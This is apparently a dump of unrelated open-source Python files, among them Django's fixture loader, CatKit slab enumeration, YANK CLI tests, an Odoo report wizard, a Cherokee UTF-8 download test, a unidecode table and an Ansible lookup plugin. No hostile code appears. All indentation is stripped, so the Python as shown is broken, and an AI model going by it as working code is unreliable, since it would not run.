compression_formats = compression_types.keys()
if len(parts) == 1:
fixture_name = parts[0]
formats = serializers.get_public_serializer_formats()
else:
fixture_name, format = '.'.join(parts[:-1]), parts[-1]
if format in serializers.get_public_serializer_formats():
formats = [format]
else:
formats = []
if formats:
if verbosity > 1:
self.stdout.write("Loading '%s' fixtures...\n" % fixture_name)
else:
self.stderr.write(
self.style.ERROR("Problem installing fixture '%s': %s is not a known serialization format.\n" %
(fixture_name, format)))
if commit:
transaction.rollback(using=using)
transaction.leave_transaction_management(using=using)
return
if os.path.isabs(fixture_name):
fixture_dirs = [fixture_name]
else:
fixture_dirs = app_fixtures + list(settings.FIXTURE_DIRS) + ['']
for fixture_dir in fixture_dirs:
if verbosity > 1:
self.stdout.write("Checking %s for fixtures...\n" % humanize(fixture_dir))
label_found = False
for combo in product([using, None], formats, compression_formats):
database, format, compression_format = combo
file_name = '.'.join(
p for p in [
fixture_name, database, format, compression_format
]
if p
)
if verbosity > 1:
self.stdout.write("Trying %s for %s fixture '%s'...\n" % \
(humanize(fixture_dir), file_name, fixture_name))
full_path = os.path.join(fixture_dir, file_name)
open_method = compression_types[compression_format]
try:
fixture = open_method(full_path, 'r')
if label_found:
fixture.close()
self.stderr.write(self.style.ERROR("Multiple fixtures named '%s' in %s. Aborting.\n" %
(fixture_name, humanize(fixture_dir))))
if commit:
transaction.rollback(using=using)
transaction.leave_transaction_management(using=using)
return
else:
fixture_count += 1
objects_in_fixture = 0
loaded_objects_in_fixture = 0
if verbosity > 0:
self.stdout.write("Installing %s fixture '%s' from %s.\n" % \
(format, fixture_name, humanize(fixture_dir)))
try:
objects = serializers.deserialize(format, fixture, using=using)
for obj in objects:
objects_in_fixture += 1
if router.allow_syncdb(using, obj.object.__class__):
loaded_objects_in_fixture += 1
models.add(obj.object.__class__)
obj.save(using=using)
loaded_object_count += loaded_objects_in_fixture
fixture_object_count += objects_in_fixture
label_found = True
except (SystemExit, KeyboardInterrupt):
raise
except Exception:
import traceback
fixture.close()
if commit:
transaction.rollback(using=using)
transaction.leave_transaction_management(using=using)
if show_traceback:
traceback.print_exc()
else:
self.stderr.write(
self.style.ERROR("Problem installing fixture '%s': %s\n" %
(full_path, ''.join(traceback.format_exception(sys.exc_type,
sys.exc_value, sys.exc_traceback)))))
return
fixture.close()
# If the fixture we loaded contains 0 objects, assume that an
# error was encountered during fixture loading.
if objects_in_fixture == 0:
self.stderr.write(
self.style.ERROR("No fixture data found for '%s'. (File format may be invalid.)\n" %
(fixture_name)))
if commit:
transaction.rollback(using=using)
transaction.leave_transaction_management(using=using)
return
except Exception, e:
if verbosity > 1:
self.stdout.write("No %s fixture '%s' in %s.\n" % \
(format, fixture_name, humanize(fixture_dir)))
# If we found even one object in a fixture, we need to reset the
# database sequences.
if loaded_object_count > 0:
sequence_sql = connection.ops.sequence_reset_sql(self.style, models)
if sequence_sql:
if verbosity > 1:
self.stdout.write("Resetting sequences\n")
for line in sequence_sql:
cursor.execute(line)
if commit:
transaction.commit(using=using)
transaction.leave_transaction_management(using=using)
if fixture_object_count == 0:
if verbosity > 0:
self.stdout.write("No fixtures found.\n")
else:
if verbosity > 0:
if fixture_object_count == loaded_object_count:
self.stdout.write("Installed %d object(s) from %d fixture(s)\n" % (
loaded_object_count, fixture_count))
else:
self.stdout.write("Installed %d object(s) (of %d) from %d fixture(s)\n" % (
loaded_object_count, fixture_object_count, fixture_count))
# Close the DB connection. This is required as a workaround for an
# edge case in MySQL: if the same connection is used to
# create tables, load data, and query, the query can return
# incorrect results. See Django #7572, MySQL #37735.
if commit:
connection.close()
|
jboes/CatKit
|
refs/heads/master
|
catkit/enumeration.py
|
1
|
from .gen.surface import get_unique_indices, SlabGenerator
from .gen.symmetry import get_standardized_cell
import numpy as np
def surfaces(
bulk,
width,
miller_indices=(1, 1, 1),
terminations=None,
sizes=None,
vacuum=10,
fixed=0,
layer_type='angs',
**kwargs):
"""Return a list of enumerated surfaces based on symmetry properties of
interest to the user. Any bulk structure provided will be standardized.
    This function will take additional keyword arguments for the
    :meth:`catkit.gen.surface.SlabGenerator` class.
Parameters
----------
bulk : str | Atoms
        The atomic symbol to be passed to the ASE bulk builder function
or an atoms object representing the bulk structure to use.
width : float
Minimum width of the slab in angstroms before trimming. Imposing
symmetry requirements will reduce the width.
miller_indices : int | list (3,) | list of list (n, 3)
List of the miller indices to enumerate slabs for. If an integer is
provided, the value is treated as the maximum miller index to consider
for an enumeration of all possible unique miller indices.
terminations : int | array_like
Return the terminations associated with the provided indices. If -1,
all possible terminations are enumerated.
sizes : None | int | array_like (n,)
Enumerate all surface sizes in the provided list. Sizes are integers
which represent multiples of the smallest possible surface area.
If None, return slabs with the smallest possible surface area. If an
integer, enumerate all sizes up to that multiple.
vacuum : float
Angstroms of vacuum to add to the unit cell.
fixed : int
Number of layers to constrain.
layer_type : 'angs' | 'trim' | 'stoich' | 'sym'
Method of slab layering to perform. See also:
:meth:`catkit.gen.surface.SlabGenerator`
Returns
-------
slabs : list of Gratoms objects
Return a list of enumerated slab structures.
"""
standardized_bulk = get_standardized_cell(bulk, tol=5e-3)
if isinstance(miller_indices, int):
miller_indices = get_unique_indices(
standardized_bulk, miller_indices)
elif isinstance(miller_indices, (list, np.ndarray)):
miller_indices = np.atleast_2d(miller_indices)
if sizes is None:
sizes = np.ones(1)
elif isinstance(sizes, int):
sizes = np.arange(sizes)
slabs = []
for miller in miller_indices:
generator = SlabGenerator(
bulk=standardized_bulk,
miller_index=miller,
layers=width,
vacuum=vacuum,
fixed=fixed,
layer_type=layer_type,
**kwargs)
if terminations is None:
iterms = np.zeros(1)
elif terminations == -1:
zshifts = generator.get_unique_terminations()
iterms = np.arange(len(zshifts))
else:
iterms = terminations
for i in iterms:
for size in sizes:
slab = generator.get_slab(size=int(size), iterm=i)
slab.info['miller'] = miller
slabs += [slab]
return slabs
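# A minimal usage sketch (hypothetical lattice constant; assumes ASE is
# installed alongside CatKit):
#
#     from ase.build import bulk
#     atoms = bulk('Pd', 'fcc', a=3.89, cubic=True)
#     slabs = surfaces(atoms, width=8.0, miller_indices=2, vacuum=10)
#     # -> one slab per unique facet up to a maximum Miller index of 2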
|
crasker/scrapy
|
refs/heads/master
|
scrapy/core/__init__.py
|
216
|
"""
Scrapy core library classes and functions.
"""
|
luzheqi1987/nova-annotation
|
refs/heads/master
|
nova/openstack/common/report/views/__init__.py
|
82
|
# Copyright 2013 Red Hat, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
"""Provides predefined views
This module provides a collection of predefined views
for use in reports. It is separated by type (xml, json, or text).
Each type contains a submodule called 'generic' containing
several basic, universal views for that type. There is also
a predefined view that utilizes Jinja.
"""
|
choderalab/yank
|
refs/heads/master
|
Yank/tests/test_cli.py
|
1
|
#!/usr/bin/python
# =============================================================================================
# MODULE DOCSTRING
# =============================================================================================
"""
Test command-line interface.
"""
# =============================================================================================
# GLOBAL IMPORTS
# =============================================================================================
import os
import textwrap
import subprocess
import openmmtools as mmtools
from yank import utils
# =============================================================================================
# UNIT TESTS
# =============================================================================================
def run_cli(arguments, expected_output=None):
"""Generic helper to run command line arguments"""
# cli.main(argv=arguments.split())
command = 'yank ' + arguments
[stoutdata, sterrdata] = subprocess.Popen(command.split()).communicate()
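    # NOTE: without stdout=subprocess.PIPE and stderr=subprocess.PIPE,
    # communicate() returns (None, None), so the checks below only take
    # effect once output capturing is added (see TODO).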
    # TODO: Interpret subprocess data better
if sterrdata:
message = "An error return value (%s) was obtained:\n" % str(sterrdata)
message += "\n"
message += stoutdata
message += "\n"
raise Exception(message)
if expected_output:
if stoutdata != expected_output:
message = "Output differs from expected output.\n"
message += "\n"
message += "Expected output:\n"
message += expected_output
message += "\n"
message += "Actual output:\n"
message += stoutdata
message += "\n"
raise Exception(message)
def test_help():
"""Test that the help command works"""
run_cli('--help')
def test_cite():
"""Test that the cite command works"""
run_cli('--cite')
def test_selftest():
"""Test that the selftest command works"""
try:
run_cli('selftest')
except ImportError as e:
# Trap the libOpenCl error
if "libOpenCL.so" in e.message:
print("Failed to load OpenCL. If this is an expected result, carry on, if not, please debug!")
else:
raise e
def test_script_yaml():
"""Check that yank script --yaml command works."""
setup_dir = utils.get_data_filename(os.path.join('tests', 'data', 'p-xylene-implicit'))
pxylene_path = os.path.join(setup_dir, 'p-xylene.mol2')
lysozyme_path = os.path.join(setup_dir, '181L-pdbfixer.pdb')
yaml_content = """
---
options:
default_number_of_iterations: 0
output_dir: '.'
resume_setup: yes
resume_simulation: no
minimize: no
molecules:
T4lysozyme:
filepath: {}
p-xylene:
filepath: {}
antechamber:
charge_method: bcc
solvents:
vacuum:
nonbonded_method: NoCutoff
protocols:
absolute-binding:
complex:
alchemical_path:
lambda_electrostatics: [1.0, 0.5, 0.0]
lambda_sterics: [1.0, 0.5, 0.0]
solvent:
alchemical_path:
lambda_electrostatics: [1.0, 0.5, 0.0]
lambda_sterics: [1.0, 0.5, 0.0]
systems:
system:
receptor: T4lysozyme
ligand: p-xylene
solvent: vacuum
leap:
parameters: [leaprc.gaff, oldff/leaprc.ff14SB]
experiments:
system: system
protocol: absolute-binding
restraint:
type: FlatBottom
""".format(lysozyme_path, pxylene_path)
with mmtools.utils.temporary_directory() as tmp_dir:
yaml_file_path = os.path.join(tmp_dir, 'yank.yaml')
with open(yaml_file_path, 'w') as f:
f.write(textwrap.dedent(yaml_content))
run_cli('script --yaml={}'.format(yaml_file_path))
# Test option overriding.
run_cli('script --yaml={} -o options:resume_simulation:yes'.format(yaml_file_path))
def test_script_yaml_status():
"""Check that 'yank script --yaml --status' works."""
host_path = mmtools.testsystems.get_data_filename('data/cb7-b2/cb7_am1-bcc.mol2')
guest_path = mmtools.testsystems.get_data_filename('data/cb7-b2/b2_am1-bcc.mol2')
yaml_content = """\
---
options:
output_dir: 'output'
resume_setup: yes
resume_simulation: no
minimize: no
verbose: no
switch_experiment_interval: 20
molecules:
host:
filepath: {}
antechamber:
charge_method: null
guest:
filepath: {}
antechamber:
charge_method: null
mcmc_moves:
langevin:
type: LangevinSplittingDynamicsMove
timestep: 4.0*femtosecond
collision_rate: 1.0/picosecond
reassign_velocities: yes
splitting: 'V R O R V'
n_steps: 10
n_restart_attempts: 4
samplers:
repex:
type: ReplicaExchangeSampler
mcmc_moves: langevin
number_of_iterations: 40
solvents:
vacuum:
nonbonded_method: NoCutoff
protocols:
absolute-binding:
complex:
alchemical_path:
lambda_restraints: [0.0, 1.0]
lambda_electrostatics: [1.0, 0.0]
lambda_sterics: [1.0, 0.0]
solvent:
alchemical_path:
lambda_electrostatics: [1.0, 0.0]
lambda_sterics: [1.0, 0.0]
systems:
system:
receptor: host
ligand: guest
solvent: vacuum
leap:
parameters: [leaprc.gaff, oldff/leaprc.ff14SB]
experiments:
system: system
sampler: repex
protocol: absolute-binding
restraint:
type: Harmonic
""".format(host_path, guest_path)
with mmtools.utils.temporary_directory() as tmp_dir:
yaml_file_path = os.path.join(tmp_dir, 'yank.yaml')
with open(yaml_file_path, 'w') as f:
f.write(textwrap.dedent(yaml_content))
# Test status output.
run_cli('script --yaml={} --status'.format(yaml_file_path))
# Ensure pickle file is found
output_path = os.path.join(tmp_dir, 'output', 'experiments')
filenames = os.listdir(output_path)
if 'status.pkl' not in filenames:
msg = 'Status file not found in experiment directory\n'
msg += 'contents: {}'.format(filenames)
raise Exception(msg)
|
lepistone/odoo
|
refs/heads/master
|
addons/account/wizard/account_report_print_journal.py
|
378
|
# -*- coding: utf-8 -*-
##############################################################################
#
# OpenERP, Open Source Management Solution
# Copyright (C) 2004-2010 Tiny SPRL (<http://tiny.be>).
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
##############################################################################
from openerp.osv import fields, osv
from lxml import etree
class account_print_journal(osv.osv_memory):
_inherit = "account.common.journal.report"
_name = 'account.print.journal'
_description = 'Account Print Journal'
_columns = {
'sort_selection': fields.selection([('l.date', 'Date'),
('am.name', 'Journal Entry Number'),],
'Entries Sorted by', required=True),
'journal_ids': fields.many2many('account.journal', 'account_print_journal_journal_rel', 'account_id', 'journal_id', 'Journals', required=True),
}
_defaults = {
'sort_selection': 'am.name',
'filter': 'filter_period',
'journal_ids': False,
}
def fields_view_get(self, cr, uid, view_id=None, view_type='form', context=None, toolbar=False, submenu=False):
'''
        used to set the domain on the 'journal_ids' field: we exclude or only
        propose the journals of type sale/purchase (+refund) according to the
        presence of the key 'sale_purchase_only' in the context.
'''
if context is None:
context = {}
res = super(account_print_journal, self).fields_view_get(cr, uid, view_id=view_id, view_type=view_type, context=context, toolbar=toolbar, submenu=submenu)
doc = etree.XML(res['arch'])
if context.get('sale_purchase_only'):
domain ="[('type', 'in', ('sale','purchase','sale_refund','purchase_refund'))]"
else:
domain ="[('type', 'not in', ('sale','purchase','sale_refund','purchase_refund'))]"
nodes = doc.xpath("//field[@name='journal_ids']")
for node in nodes:
node.set('domain', domain)
res['arch'] = etree.tostring(doc)
return res
def _print_report(self, cr, uid, ids, data, context=None):
if context is None:
context = {}
data = self.pre_print_report(cr, uid, ids, data, context=context)
data['form'].update(self.read(cr, uid, ids, ['sort_selection'], context=context)[0])
if context.get('sale_purchase_only'):
return self.pool['report'].get_action(cr, uid, [], 'account.report_salepurchasejournal', data=data, context=context)
else:
return self.pool['report'].get_action(cr, uid, [], 'account.report_journal', data=data, context=context)
# vim:expandtab:smartindent:tabstop=4:softtabstop=4:shiftwidth=4:
|
ol-loginov/intellij-community
|
refs/heads/master
|
python/testData/mover/continueBreak.py
|
83
|
test()
for item in range(10):
co<caret>ntinue
test1()
|
duyetdev/openerp-6.1.1
|
refs/heads/master
|
openerp/test/test_translate.py
|
460
|
# -*- coding: utf-8 -*-
##############################################################################
#
# OpenERP, Open Source Management Solution
# Copyright (C) 2010 OpenERP S.A. http://www.openerp.com
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
##############################################################################
import unittest
from openerp.tools.translate import quote, unquote
class TranslationToolsTestCase(unittest.TestCase):
def test_quote_unquote(self):
def test_string(str):
quoted = quote(str)
#print "\n1:", repr(str)
#print "2:", repr(quoted)
unquoted = unquote("".join(quoted.split('"\n"')))
#print "3:", repr(unquoted)
self.assertEquals(str, unquoted)
test_string("""test \nall kinds\n \n o\r
\\\\ nope\n\n"
""")
# The ones with 1+ backslashes directly followed by
# a newline or literal N can fail... we would need a
# state-machine parser to handle these, but this would
# be much slower so it's better to avoid them at the moment
self.assertRaises(AssertionError, quote, """test \nall kinds\n\no\r
\\\\nope\n\n"
""")
# vim:expandtab:smartindent:tabstop=4:softtabstop=4:shiftwidth=4:
|
cherokee/webserver
|
refs/heads/master
|
qa/239-utf8-file1.py
|
8
|
# -*- coding: utf-8 -*-
from base import *
DIR = "utf8file1"
FILENAME = "¡ĤĒĹĻŎ!"
MAGIC = "So, Cherokee does support UTF8"
class Test (TestBase):
def __init__ (self):
TestBase.__init__ (self, __file__)
self.name = "UTF8 file download"
self.request = "GET /%s/%s HTTP/1.0\r\n" %(DIR, FILENAME)
self.expected_error = 200
self.expected_content = MAGIC
def Prepare (self, www):
d = self.Mkdir (www, DIR)
f = self.WriteFile (d, FILENAME, 0644, MAGIC)
|
guijomatos/SickRage
|
refs/heads/master
|
lib/unidecode/x010.py
|
252
|
data = (
'k', # 0x00
'kh', # 0x01
'g', # 0x02
'gh', # 0x03
'ng', # 0x04
'c', # 0x05
'ch', # 0x06
'j', # 0x07
'jh', # 0x08
'ny', # 0x09
'nny', # 0x0a
'tt', # 0x0b
'tth', # 0x0c
'dd', # 0x0d
'ddh', # 0x0e
'nn', # 0x0f
'tt', # 0x10
'th', # 0x11
'd', # 0x12
'dh', # 0x13
'n', # 0x14
'p', # 0x15
'ph', # 0x16
'b', # 0x17
'bh', # 0x18
'm', # 0x19
'y', # 0x1a
'r', # 0x1b
'l', # 0x1c
'w', # 0x1d
's', # 0x1e
'h', # 0x1f
'll', # 0x20
'a', # 0x21
'[?]', # 0x22
'i', # 0x23
'ii', # 0x24
'u', # 0x25
'uu', # 0x26
'e', # 0x27
'[?]', # 0x28
'o', # 0x29
'au', # 0x2a
'[?]', # 0x2b
'aa', # 0x2c
'i', # 0x2d
'ii', # 0x2e
'u', # 0x2f
'uu', # 0x30
'e', # 0x31
'ai', # 0x32
'[?]', # 0x33
'[?]', # 0x34
'[?]', # 0x35
'N', # 0x36
'\'', # 0x37
':', # 0x38
'', # 0x39
'[?]', # 0x3a
'[?]', # 0x3b
'[?]', # 0x3c
'[?]', # 0x3d
'[?]', # 0x3e
'[?]', # 0x3f
'0', # 0x40
'1', # 0x41
'2', # 0x42
'3', # 0x43
'4', # 0x44
'5', # 0x45
'6', # 0x46
'7', # 0x47
'8', # 0x48
'9', # 0x49
' / ', # 0x4a
' // ', # 0x4b
'n*', # 0x4c
'r*', # 0x4d
'l*', # 0x4e
'e*', # 0x4f
'sh', # 0x50
'ss', # 0x51
'R', # 0x52
'RR', # 0x53
'L', # 0x54
'LL', # 0x55
'R', # 0x56
'RR', # 0x57
'L', # 0x58
'LL', # 0x59
'[?]', # 0x5a
'[?]', # 0x5b
'[?]', # 0x5c
'[?]', # 0x5d
'[?]', # 0x5e
'[?]', # 0x5f
'[?]', # 0x60
'[?]', # 0x61
'[?]', # 0x62
'[?]', # 0x63
'[?]', # 0x64
'[?]', # 0x65
'[?]', # 0x66
'[?]', # 0x67
'[?]', # 0x68
'[?]', # 0x69
'[?]', # 0x6a
'[?]', # 0x6b
'[?]', # 0x6c
'[?]', # 0x6d
'[?]', # 0x6e
'[?]', # 0x6f
'[?]', # 0x70
'[?]', # 0x71
'[?]', # 0x72
'[?]', # 0x73
'[?]', # 0x74
'[?]', # 0x75
'[?]', # 0x76
'[?]', # 0x77
'[?]', # 0x78
'[?]', # 0x79
'[?]', # 0x7a
'[?]', # 0x7b
'[?]', # 0x7c
'[?]', # 0x7d
'[?]', # 0x7e
'[?]', # 0x7f
'[?]', # 0x80
'[?]', # 0x81
'[?]', # 0x82
'[?]', # 0x83
'[?]', # 0x84
'[?]', # 0x85
'[?]', # 0x86
'[?]', # 0x87
'[?]', # 0x88
'[?]', # 0x89
'[?]', # 0x8a
'[?]', # 0x8b
'[?]', # 0x8c
'[?]', # 0x8d
'[?]', # 0x8e
'[?]', # 0x8f
'[?]', # 0x90
'[?]', # 0x91
'[?]', # 0x92
'[?]', # 0x93
'[?]', # 0x94
'[?]', # 0x95
'[?]', # 0x96
'[?]', # 0x97
'[?]', # 0x98
'[?]', # 0x99
'[?]', # 0x9a
'[?]', # 0x9b
'[?]', # 0x9c
'[?]', # 0x9d
'[?]', # 0x9e
'[?]', # 0x9f
'A', # 0xa0
'B', # 0xa1
'G', # 0xa2
'D', # 0xa3
'E', # 0xa4
'V', # 0xa5
'Z', # 0xa6
'T`', # 0xa7
'I', # 0xa8
'K', # 0xa9
'L', # 0xaa
'M', # 0xab
'N', # 0xac
'O', # 0xad
'P', # 0xae
'Zh', # 0xaf
'R', # 0xb0
'S', # 0xb1
'T', # 0xb2
'U', # 0xb3
'P`', # 0xb4
'K`', # 0xb5
'G\'', # 0xb6
'Q', # 0xb7
'Sh', # 0xb8
'Ch`', # 0xb9
'C`', # 0xba
'Z\'', # 0xbb
'C', # 0xbc
'Ch', # 0xbd
'X', # 0xbe
'J', # 0xbf
'H', # 0xc0
'E', # 0xc1
'Y', # 0xc2
'W', # 0xc3
'Xh', # 0xc4
'OE', # 0xc5
'[?]', # 0xc6
'[?]', # 0xc7
'[?]', # 0xc8
'[?]', # 0xc9
'[?]', # 0xca
'[?]', # 0xcb
'[?]', # 0xcc
'[?]', # 0xcd
'[?]', # 0xce
'[?]', # 0xcf
'a', # 0xd0
'b', # 0xd1
'g', # 0xd2
'd', # 0xd3
'e', # 0xd4
'v', # 0xd5
'z', # 0xd6
't`', # 0xd7
'i', # 0xd8
'k', # 0xd9
'l', # 0xda
'm', # 0xdb
'n', # 0xdc
'o', # 0xdd
'p', # 0xde
'zh', # 0xdf
'r', # 0xe0
's', # 0xe1
't', # 0xe2
'u', # 0xe3
'p`', # 0xe4
'k`', # 0xe5
'g\'', # 0xe6
'q', # 0xe7
'sh', # 0xe8
'ch`', # 0xe9
'c`', # 0xea
'z\'', # 0xeb
'c', # 0xec
'ch', # 0xed
'x', # 0xee
'j', # 0xef
'h', # 0xf0
'e', # 0xf1
'y', # 0xf2
'w', # 0xf3
'xh', # 0xf4
'oe', # 0xf5
'f', # 0xf6
'[?]', # 0xf7
'[?]', # 0xf8
'[?]', # 0xf9
'[?]', # 0xfa
' // ', # 0xfb
'[?]', # 0xfc
'[?]', # 0xfd
'[?]', # 0xfe
)
|
veger/ansible
|
refs/heads/devel
|
lib/ansible/plugins/lookup/together.py
|
100
|
# (c) 2013, Bradley Young <young.bradley@gmail.com>
# (c) 2012-17 Ansible Project
# GNU General Public License v3.0+ (see COPYING or https://www.gnu.org/licenses/gpl-3.0.txt)
from __future__ import (absolute_import, division, print_function)
__metaclass__ = type
DOCUMENTATION = """
lookup: together
author: Bradley Young <young.bradley@gmail.com>
version_added: '1.3'
short_description: merges lists into synchronized list
description:
- Creates a list with the iterated elements of the supplied lists
- "To clarify with an example, [ 'a', 'b' ] and [ 1, 2 ] turn into [ ('a',1), ('b', 2) ]"
- This is basically the same as the 'zip_longest' filter and Python function
- Any 'unbalanced' elements will be substituted with 'None'
options:
_terms:
description: list of lists to merge
required: True
"""
EXAMPLES = """
- name: item.0 returns from the 'a' list, item.1 returns from the '1' list
debug:
msg: "{{ item.0 }} and {{ item.1 }}"
with_together:
- ['a', 'b', 'c', 'd']
- [1, 2, 3, 4]
"""
RETURN = """
_list:
description: synchronized list
"""
from ansible.errors import AnsibleError
from ansible.module_utils.six.moves import zip_longest
from ansible.plugins.lookup import LookupBase
from ansible.utils.listify import listify_lookup_plugin_terms
class LookupModule(LookupBase):
"""
Transpose a list of arrays:
[1, 2, 3], [4, 5, 6] -> [1, 4], [2, 5], [3, 6]
Replace any empty spots in 2nd array with None:
[1, 2], [3] -> [1, 3], [2, None]
"""
def _lookup_variables(self, terms):
results = []
for x in terms:
intermediate = listify_lookup_plugin_terms(x, templar=self._templar, loader=self._loader)
results.append(intermediate)
return results
def run(self, terms, variables=None, **kwargs):
terms = self._lookup_variables(terms)
my_list = terms[:]
if len(my_list) == 0:
raise AnsibleError("with_together requires at least one element in each list")
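        # e.g. zip_longest(['a', 'b'], [1], fillvalue=None) yields ('a', 1)
        # and ('b', None); each tuple is then flattened into the result list.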
return [self._flatten(x) for x in zip_longest(*my_list, fillvalue=None)]
|